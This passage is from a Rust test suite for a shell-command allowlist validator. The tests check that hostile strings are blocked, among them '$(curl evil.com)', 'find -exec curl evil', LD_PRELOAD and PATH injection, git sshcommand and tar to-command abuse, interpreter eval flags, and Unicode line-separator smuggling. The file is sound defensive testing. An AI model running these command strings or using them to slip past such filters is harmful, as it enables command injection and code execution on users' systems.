1080        // With empty allowlist, dangerous patterns are checked first
1081        // eval at command position should be caught
1082        assert!(
1083            result.is_err(),
1084            "eval at start must be blocked even with empty allowlist"
1085        );
1086    }
1087
1088    #[test]
1089    fn empty_allowlist_still_blocks_dollar_paren_at_start() {
1090        let result = check_shell_allowlist("$(curl evil.com)");
1091        assert!(
1092            result.is_err(),
1093            "$() at command position must be blocked even with empty allowlist"
1094        );
1095    }
1096
1097    // --- Security: interpreter abuse ---
1098
1099    #[test]
1100    fn python_c_blocked() {
1101        let list = allow(&["python3"]);
1102        let result = check_all_segments("python3 -c 'import os; os.system(\"id\")'", &list);
1103        assert!(result.is_err(), "python3 -c must be blocked");
1104    }
1105
1106    #[test]
1107    fn node_e_blocked() {
1108        let list = allow(&["node"]);
1109        let result = check_all_segments("node -e 'process.exit(1)'", &list);
1110        assert!(result.is_err(), "node -e must be blocked");
1111    }
1112
1113    #[test]
1114    fn python_script_allowed() {
1115        let list = allow(&["python3"]);
1116        let result = check_all_segments("python3 script.py", &list);
1117        assert!(result.is_ok(), "python3 with script file must be allowed");
1118    }
1119
1120    #[test]
1121    fn env_delegates_to_unlisted_blocked() {
1122        let list = allow(&["env", "git"]);
1123        let result = check_all_segments("env /bin/sh -c 'id'", &list);
1124        assert!(
1125            result.is_err(),
1126            "env delegating to unlisted command must be blocked"
1127        );
1128    }
1129
1130    #[test]
1131    fn env_delegates_to_listed_allowed() {
1132        let list = allow(&["env", "git"]);
1133        let result = check_all_segments("env git status", &list);
1134        assert!(
1135            result.is_ok(),
1136            "env delegating to listed command must be allowed"
1137        );
1138    }
1139
1140    // --- Security: env override is additive ---
1141
1142    #[test]
1143    fn env_override_is_additive() {
1144        let base_list = crate::core::config::default_shell_allowlist();
1145        assert!(base_list.contains(&"git".to_string()));
1146    }
1147
1148    // --- Phase 1 V2: SAFE checks ---
1149
1150    #[test]
1151    fn dot_source_alias_blocked() {
1152        let list = allow(&["echo"]);
1153        let result = check_all_segments(". ~/.bashrc", &list);
1154        assert!(result.is_err(), ". (source alias) must be blocked");
1155    }
1156
1157    #[test]
1158    fn backslash_newline_normalized() {
1159        let normalized = normalize_line_continuations("echo ok && \\\ncurl evil");
1160        assert!(
1161            !normalized.contains('\n'),
1162            "backslash-newline must be removed"
1163        );
1164        assert!(
1165            normalized.contains("curl"),
1166            "content after continuation must be preserved"
1167        );
1168    }
1169
1170    #[test]
1171    fn delegation_recursive_interpreter_check() {
1172        let list = allow(&["env", "python3"]);
1173        let result = check_all_segments("env python3 -c 'import os'", &list);
1174        assert!(
1175            result.is_err(),
1176            "env python3 -c must be blocked via recursive check"
1177        );
1178    }
1179
1180    #[test]
1181    fn delegation_recursive_normal_allowed() {
1182        let list = allow(&["env", "git"]);
1183        let result = check_all_segments("env git status", &list);
1184        assert!(result.is_ok(), "env git status must be allowed");
1185    }
1186
1187    #[test]
1188    fn eval_flags_extended_r() {
1189        let list = allow(&["php"]);
1190        let result = check_all_segments("php -r 'system(\"id\")'", &list);
1191        assert!(result.is_err(), "php -r must be blocked");
1192    }
1193
1194    #[test]
1195    fn eval_flags_extended_p() {
1196        let list = allow(&["node"]);
1197        let result = check_all_segments("node -p 'process.exit(1)'", &list);
1198        assert!(result.is_err(), "node -p must be blocked");
1199    }
1200
1201    #[test]
1202    fn combined_flags_pe_blocked() {
1203        let list = allow(&["perl"]);
1204        let result = check_all_segments("perl -pe 's/foo/bar/'", &list);
1205        assert!(result.is_err(), "perl -pe must be blocked (combined flag)");
1206    }
1207
1208    #[test]
1209    fn combined_flags_ne_blocked() {
1210        let list = allow(&["perl"]);
1211        let result = check_all_segments("perl -ne 'print'", &list);
1212        assert!(result.is_err(), "perl -ne must be blocked (combined flag)");
1213    }
1214
1215    #[test]
1216    fn heredoc_to_interpreter_blocked() {
1217        let list = allow(&["python3"]);
1218        let result = check_all_segments("python3 <<'EOF'", &list);
1219        assert!(result.is_err(), "heredoc to interpreter must be blocked");
1220    }
1221
1222    #[test]
1223    fn python_script_file_still_allowed() {
1224        let list = allow(&["python3"]);
1225        assert!(check_all_segments("python3 script.py", &list).is_ok());
1226        assert!(check_all_segments("python3 -u script.py", &list).is_ok());
1227    }
1228
1229    #[test]
1230    fn bare_interpreter_detection() {
1231        assert!(is_bare_interpreter_stdin("python3"));
1232        assert!(is_bare_interpreter_stdin("python3 -u"));
1233        assert!(!is_bare_interpreter_stdin("python3 script.py"));
1234        assert!(!is_bare_interpreter_stdin("python3 -u script.py"));
1235    }
1236
1237    // --- Phase 1 V2: WARN-FIRST checks (default = command passes through) ---
1238
1239    #[test]
1240    fn dollar_paren_in_args_passes_by_default() {
1241        let list = allow(&["echo", "git", "cat"]);
1242        assert!(
1243            check_all_segments("echo $(whoami)", &list).is_ok(),
1244            "$() in args must still pass when shell_strict_mode=false (default)"
1245        );
1246    }
1247
1248    #[test]
1249    fn backticks_in_args_passes_by_default() {
1250        let list = allow(&["echo"]);
1251        assert!(
1252            check_all_segments("echo `date`", &list).is_ok(),
1253            "backticks in args must still pass when shell_strict_mode=false"
1254        );
1255    }
1256
1257    #[test]
1258    fn git_commit_with_subst_passes_by_default() {
1259        let list = allow(&["git", "cat"]);
1260        assert!(
1261            check_all_segments(
1262                "git commit -m \"$(cat <<'EOF'\nfix: something\nEOF\n)\"",
1263                &list,
1264            )
1265            .is_ok(),
1266            "git commit with $() must still pass (regression test)"
1267        );
1268    }
1269
1270    // --- Empty allowlist + unconditional blocked ---
1271
1272    // --- Phase 6: Dangerous flag detection ---
1273
1274    #[test]
1275    fn git_status_allowed() {
1276        let list = allow(&["git"]);
1277        assert!(check_all_segments("git status", &list).is_ok());
1278    }
1279
1280    #[test]
1281    fn git_upload_pack_blocked() {
1282        let list = allow(&["git"]);
1283        let result = check_all_segments("git --upload-pack=\"evil\" clone repo", &list);
1284        assert!(result.is_err(), "git --upload-pack must be blocked");
1285    }
1286
1287    #[test]
1288    fn git_config_sshcommand_blocked() {
1289        let list = allow(&["git"]);
1290        let result = check_all_segments("git --config=core.sshcommand=\"evil\" clone repo", &list);
1291        assert!(
1292            result.is_err(),
1293            "git --config=core.sshcommand must be blocked"
1294        );
1295    }
1296
1297    #[test]
1298    fn tar_extract_allowed() {
1299        let list = allow(&["tar"]);
1300        assert!(check_all_segments("tar xf archive.tar", &list).is_ok());
1301    }
1302
1303    #[test]
1304    fn tar_to_command_blocked() {
1305        let list = allow(&["tar"]);
1306        let result = check_all_segments("tar xf a.tar --to-command=evil", &list);
1307        assert!(result.is_err(), "tar --to-command must be blocked");
1308    }
1309
1310    #[test]
1311    fn find_name_allowed() {
1312        let list = allow(&["find"]);
1313        assert!(check_all_segments("find . -name \"*.rs\"", &list).is_ok());
1314    }
1315
1316    #[test]
1317    fn find_exec_blocked() {
1318        let list = allow(&["find"]);
1319        let result = check_all_segments("find . -exec curl evil \\;", &list);
1320        assert!(result.is_err(), "find -exec must be blocked");
1321    }
1322
1323    #[test]
1324    fn awk_system_blocked() {
1325        let list = allow(&["awk"]);
1326        let result = check_all_segments("awk '{system(\"id\")}'", &list);
1327        assert!(result.is_err(), "awk system() must be blocked");
1328    }
1329
1330    #[test]
1331    fn awk_normal_allowed() {
1332        let list = allow(&["awk"]);
1333        assert!(check_all_segments("awk '{print $1}'", &list).is_ok());
1334    }
1335
1336    #[test]
1337    fn inline_path_env_blocked() {
1338        let list = allow(&["git"]);
1339        let result = check_all_segments("PATH=/tmp/evil git status", &list);
1340        assert!(result.is_err(), "PATH= inline env must be blocked");
1341    }
1342
1343    #[test]
1344    fn inline_ld_preload_blocked() {
1345        let list = allow(&["ls"]);
1346        let result = check_all_segments("LD_PRELOAD=/tmp/evil.so ls", &list);
1347        assert!(result.is_err(), "LD_PRELOAD= inline env must be blocked");
1348    }
1349
1350    #[test]
1351    fn echo_path_in_quotes_allowed() {
1352        let list = allow(&["echo"]);
1353        assert!(
1354            check_all_segments("echo \"PATH=test\"", &list).is_ok(),
1355            "PATH inside quotes is not an inline env assignment"
1356        );
1357    }
1358
1359    // --- Empty allowlist + unconditional blocked ---
1360
1361    #[test]
1362    fn empty_allowlist_blocks_dot_source() {
1363        let result = check_shell_allowlist(". /tmp/evil.sh");
1364        assert!(
1365            result.is_err(),
1366            ". must be blocked even with empty allowlist"
1367        );
1368    }
1369
1370    #[test]
1371    fn unicode_line_separators_normalized() {
1372        let normalized = normalize_line_continuations("echo ok\u{2028}curl evil");
1373        assert!(
1374            normalized.contains('\n'),
1375            "U+2028 must be normalized to newline"
1376        );
1377    }
1378
1379    #[test]
1380    fn unicode_paragraph_separator_normalized() {
1381        let normalized = normalize_line_continuations("echo ok\u{2029}curl evil");
1382        assert!(
1383            normalized.contains('\n'),
1384            "U+2029 must be normalized to newline"
1385        );
1386    }
1387
1388    #[test]
1389    fn empty_allowlist_blocks_exec() {
1390        let result = check_shell_allowlist("exec /bin/sh");
1391        // exec is in has_dangerous_patterns or check_unconditional_blocked_only
1392        // With empty allowlist, check_unconditional_blocked_only catches it
1393        // Actually exec at command start is not caught by has_dangerous_patterns
1394        // but by check_unconditional_blocked_only
1395        assert!(
1396            result.is_err(),
1397            "exec must be blocked even with empty allowlist"
1398        );
1399    }
1400}
lean_ctx/core/shell_allowlist.rs

lean_ctx/core/
shell_allowlist.rs